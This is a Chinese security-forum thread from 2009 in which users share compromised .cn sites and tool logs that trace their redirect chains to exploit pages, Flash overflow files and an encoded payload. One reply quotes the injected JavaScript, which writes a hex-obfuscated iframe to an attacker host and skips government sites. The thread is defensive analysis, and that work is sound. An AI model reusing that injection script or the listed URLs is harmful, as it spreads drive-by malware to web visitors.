收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) 惡意網站
返回列表 发新帖
查看: 1968|回复: 6
收起左侧

[已鉴定] 惡意網站

[复制链接]
ryanking
发表于 2009-9-3 09:42:59 | 显示全部楼层 |阅读模式
http://gangao.org.cn/
http://helanlan.cn/
http://yuhaiwei.cn/
http://mashucn.cn/
http://shiruidan.cn/
http://shixiaoxia.cn/
http://w.jsguangji.cn/
http://w.siyou.org.cn/
http://w.tlinee.com.cn/
http://jiayifan.cn/
http://w.toyony.com.cn/
http://w.ttkiss.com.cn/
http://yaolihui.cn/
http://yujinshan.cn/
回复

举报

冰比冰水冰 该用户已被删除
发表于 2009-9-3 10:02:15 | 显示全部楼层
Log is generated by FreShow.
[wide]http://gangao.org.cn/
    [frame]http://x85x.3322.org/dszq/2.htm
        [frame]http://3eifj.cn/x2/xx.html
            [frame]http://3eifj.cn/x2/Td14.htm
            [frame]http://3eifj.cn/x2/yt.htm
            [frame]http://3eifj.cn/x2/td09.htm
            [frame]http://3eifj.cn/x2/yut.htm
        [script]http://js.tongji.linezing.com/1240663/tongji.js
回复

举报

冰比冰水冰 该用户已被删除
发表于 2009-9-3 10:04:54 | 显示全部楼层
Log is generated by FreShow.
[wide]http://w.siyou.org.cn/
    [frame]http://x85x.3322.org/dszq/2.htm
        [frame]http://3eifj.cn/x2/xx.html
            [frame]http://3eifj.cn/x2/Td14.htm
                [script]http://3eifj.cn/x2/14.js
                    [object]http://d.cdwsx.com/xx/x2.css
            [frame]http://3eifj.cn/x2/yt.htm
                [script]http://3eifj.cn/x2/url.jpg
                    [object]http://3eifj.cn/x2/thpt/:d/c.wdxsc.mox//x2xc.ss
            [frame]http://3eifj.cn/x2/td09.htm
            [frame]http://3eifj.cn/x2/yut.htm
        [script]http://tongji.linezing.com/1240663/tongji.js

没意思。。。每天都是这些个。。
回复

举报

linjw
发表于 2009-9-3 14:01:26 | 显示全部楼层
关于:hxxp://yujinshan.cn/解密的日志(全体输出 -  59):

Level  0>http://yujinshan.cn/
Level  1>http://quuk.3322.org/dszq/2.htm
Level  2>http://tongji.linezing.com/1240663/tongji.js
Level  2>http://3eifj.cn/x2/xx.html
Level  3>http://3eifj.cn/x2/yut.htm
Level  4>http://3eifj.cn/x2/of.htm
Level  5>http://3eifj.cn/x2/of2.jpg
Level  5>http://3eifj.cn/x2/of.jpg
Level  5>http://3eifj.cn/x2/of1.jpg
Level  5>http://3eifj.cn/x2/of.js
Level  6>http://d.cdwsx.com/xx/x2.css  ●
Level  4>http://3eifj.cn/x2/ytfl1.htm
Level  5>http://3eifj.cn/x2/y1.htm
Level  6>http://3eifj.cn/x2/x5.swf  ●
Level  7>http://d.cdwsx.com/xx/x2.css  ●
Level  6>http://3eifj.cn/x2/x2.swf  ●
Level  6>http://3eifj.cn/x2/x4.swf  ●
Level  6>http://3eifj.cn/x2/x3.swf  ●
Level  6>http://3eifj.cn/x2/x1.swf  ●
Level  5>http://3eifj.cn/x2/t2.htm
Level  6>http://3eifj.cn/x2/x11.swf  ●
Level  7>http://d.cdwsx.com/xx/x2.css  ●
Level  6>http://3eifj.cn/x2/x8.swf  ●
Level  6>http://3eifj.cn/x2/x10.swf  ●
Level  6>http://3eifj.cn/x2/x9.swf  ●
Level  6>http://3eifj.cn/x2/x7.swf  ●
Level  5>http://3eifj.cn/x2/y1.htm
Level  4>http://3eifj.cn/x2/ytfl.htm
Level  5>http://3eifj.cn/x2/ff.html
Level  6>http://3eifj.cn/x2/xp.swf  ●
Level  6>http://3eifj.cn/x2/done.swf  ●
Level  6>http://d.cdwsx.com/xx/x2.css  ●
Level  5>http://3eifj.cn/x2/ff.html
Level  5>http://3eifj.cn/x2/ie.html
Level  6>http://3eifj.cn/x2/xp.swf  ●
Level  6>http://3eifj.cn/x2/done.swf  ●
Level  6>http://d.cdwsx.com/xx/x2.css  ●
Level  5>http://3eifj.cn/x2/ff.html
Level  5>http://3eifj.cn/x2/ie.html
Level  5>http://3eifj.cn/x2/ff.html
Level  3>http://3eifj.cn/x2/td09.htm
Level  4>http://3eifj.cn/x2/092.js
Level  4>http://3eifj.cn/x2/091.js
Level  5>http://d.cdwsx.com/xx/x2.css  ●
Level  3>http://3eifj.cn/x2/yt.htm
Level  4>http://3eifj.cn/x2/f.jpg
Level  4>http://3eifj.cn/x2/e.jpg
Level  4>http://3eifj.cn/x2/d.jpg
Level  4>http://3eifj.cn/x2/c.jpg
Level  4>http://3eifj.cn/x2/url.jpg
Level  5>http://d.cdwsx.com/xx/x2.css  ●
Level  4>http://3eifj.cn/x2/b.jpg
Level  4>http://3eifj.cn/x2/a.jpg
Level  3>http://3eifj.cn/x2/td14.htm
Level  4>http://3eifj.cn/x2/16.js
Level  4>http://3eifj.cn/x2/15.js
Level  4>http://3eifj.cn/x2/14.js
Level  5>http://d.cdwsx.com/xx/x2.css  ●
Level  4>http://3eifj.cn/x2/17.js

日志由 Redoce2.0第40次修正版于 2009-9-3 14:01:14 生成。
回复

举报

nanhezzb
头像被屏蔽
发表于 2009-9-3 15:12:54 | 显示全部楼层
CN域名太便宜了,建议涨价啊!免得挂马成本都这么低
回复

举报

laha369
发表于 2009-9-4 19:15:56 | 显示全部楼层
if(document.location.href.indexOf("gov")>=0) {} else {document.write("
") document.write(unescape('%3Ciframe%20src%3Dhttp%3A//%79%61%64%65%2E%33%33%32%32%2E%6F%72%67/%64%73%7A%71/%32.htm%3E%3C/iframe%3E')) document.write("
")}
回复

举报

IllusionWing
发表于 2009-9-4 19:30:26 | 显示全部楼层
原始 - http://jiayifan.cn/
扫描式跨站分析 - 原始 - 可疑 - http://%79%61%64%65%2E%33%33%32%32%2E%6F%72%67/%64%73%7A%71/%32.htm
开始自动解析 - http://%79%61%64%65%2E%33%33%32%32%2E%6F%72%67/%64%73%7A%71/%32.htm
L1 - http://wm.6bief.cn/x2/xx.html
L2 - http://wm.6bief.cn/x2/Td14.htm
L2 - http://wm.6bief.cn/x2/yt.htm
L2 - http://wm.6bief.cn/x2/td09.htm
L2 - http://wm.6bief.cn/x2/yut.htm
L3 - http://wm.6bief.cn/x2/17.js
L3 - http://wm.6bief.cn/x2/14.js
L3 - http://wm.6bief.cn/x2/15.js
L3 - http://wm.6bief.cn/x2/16.js
L3 - http://wm.6bief.cn/x2/a1.jpg
L3 - http://wm.6bief.cn/x2/b.jpg
L3 - http://wm.6bief.cn/x2/url.jpg
自动解析 - Auto XOR - 高度可疑 - http://d.cdwsx.com/xx/x2.css
L3 - http://wm.6bief.cn/x2/c.jpg
L3 - http://wm.6bief.cn/x2/d.jpg
L3 - http://wm.6bief.cn/x2/e.jpg
L3 - http://wm.6bief.cn/x2/f.jpg
L3 - http://wm.6bief.cn/x2/091.js
自动解析 - Auto XOR - 高度可疑 - http://d.cdwsx.com/xx/x2.css
L3 - http://wm.6bief.cn/x2/092.js
L3 - http://wm.6bief.cn/x2/ytfl.htm
L3 - http://wm.6bief.cn/x2/ytfl1.htm
L3 - http://wm.6bief.cn/x2/of.htm
关注 - http://d.cdwsx.com/xx/x2.css
L4 - http://wm.6bief.cn/x2/s1;o2.click}
L4 - http://wm.6bief.cn/x2/y1.htm
L4 - http://wm.6bief.cn/x2/t2.htm
L4 - http://wm.6bief.cn/x2/of.js
自动解析 - Auto XOR - 高度可疑 - http://d.cdwsx.com/xx/x2.css
L4 - http://wm.6bief.cn/x2/of1.jpg
L4 - http://wm.6bief.cn/x2/of.jpg
L4 - http://wm.6bief.cn/x2/of2.jpg
可能的Flash溢出 - http://wm.6bief.cn/x2/x1.swf
NATIVE AUTO XOR - 高度可疑 - http://d.cdwsx.com/xx/x2.css
可能的Flash溢出 - http://wm.6bief.cn/x2/x3.swf
NATIVE AUTO XOR - 高度可疑 - http://d.cdwsx.com/xx/x2.css
可能的Flash溢出 - http://wm.6bief.cn/x2/x4.swf
NATIVE AUTO XOR - 高度可疑 - http://d.cdwsx.com/xx/x2.css
可能的Flash溢出 - http://wm.6bief.cn/x2/x2.swf
NATIVE AUTO XOR - 高度可疑 - http://d.cdwsx.com/xx/x2.css
可能的Flash溢出 - http://wm.6bief.cn/x2/x5.swf
NATIVE AUTO XOR - 高度可疑 - http://d.cdwsx.com/xx/x2.css
可能的Flash溢出 - http://wm.6bief.cn/x2/x7.swf
NATIVE AUTO XOR - 高度可疑 - http://d.cdwsx.com/xx/x2.css
可能的Flash溢出 - http://wm.6bief.cn/x2/x9.swf
NATIVE AUTO XOR - 高度可疑 - http://d.cdwsx.com/xx/x2.css
可能的Flash溢出 - http://wm.6bief.cn/x2/x10.swf
NATIVE AUTO XOR - 高度可疑 - http://d.cdwsx.com/xx/x2.css
可能的Flash溢出 - http://wm.6bief.cn/x2/x8.swf
NATIVE AUTO XOR - 高度可疑 - http://d.cdwsx.com/xx/x2.css
可能的Flash溢出 - http://wm.6bief.cn/x2/x11.swf
NATIVE AUTO XOR - 高度可疑 - http://d.cdwsx.com/xx/x2.css

输出的对象 - http://d.cdwsx.com/xx/x2.css

此分析日志由 Illusion Wing 使用 Astox v1 Build 1100 在 2009年9月4日19时30分17秒 生成。
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-18 06:57 , Processed in 0.135380 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表